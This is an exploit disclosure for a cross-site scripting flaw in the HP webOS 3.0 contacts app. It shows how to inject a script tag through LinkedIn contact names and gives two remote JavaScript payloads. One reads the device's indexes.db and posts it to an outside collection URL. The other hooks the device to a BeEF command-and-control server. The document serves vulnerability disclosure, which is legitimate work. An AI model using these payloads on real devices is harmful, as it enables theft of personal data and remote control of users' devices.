# Exploit Title: HP webOS 3.0 Remote Code Execution Vulnerability
# Author: malloc(i)
# Date: 06/30/2011
# Software Link: 
# https://developer.palm.com/content/resources/develop/sdk_pdk_download.html
# Product: http://www.palm.com/us/products/pads/touchpad/index.html#video

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP webOS 3.0. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the contacts application. When handling the fist name and/or last name from an imported contact, malicious injected HTML/JvaScript code renders, which allows an attacker to inject arbitrary code into the contacts application. This can be abused by an attacker to perform a cross-site scripting attack on the device.

The ability for an attacker to execute arbitrary code can be demonstrated by the following proof of concept.

Attack Vector:
Inject the javascript code into the contact information within linkedin to get an external JavaScript file to execute.  The first name and Last name fields concatinate within webOS, so the character limit of 20 chars per name entry imposed by linkedin can be extended to 40 characters. 
  
<script src=URL/payload.js></script>

Inject XSS code to source in a remote JavaScript file which will execute the malicious payload. 


Remote JavaScript Payload Examples:

1) Remote File Access Vulnerability

document.write("<html><head><script src=\"/usr/palm/frameworks/mojo/mojo.js\" type=\"text/javascript\" ></script></head><iframe src=\"javascript:var get=new Ajax.Request('/var/db/main/indexes.db',{method:'get',evalJSON:'false',onSuccess:function(response){var request=new Ajax.Request('http://www.URL/collectData.php',{method:'post',evalJson:'false',postBody:response.responseText});}});\"></html>");

2) Remote Command and Control (BeEF)

document.write("<html><head><script src=\"/usr/palm/frameworks/mojo/mojo.js\" type=\"text/javascript\" x-mojo-version\"1\"></script></head><script src=\"http://URL/beef/hook/beefmagic.js.php\" type=\"text/javascript\" x-mojo-version=\"1\"></script></html>");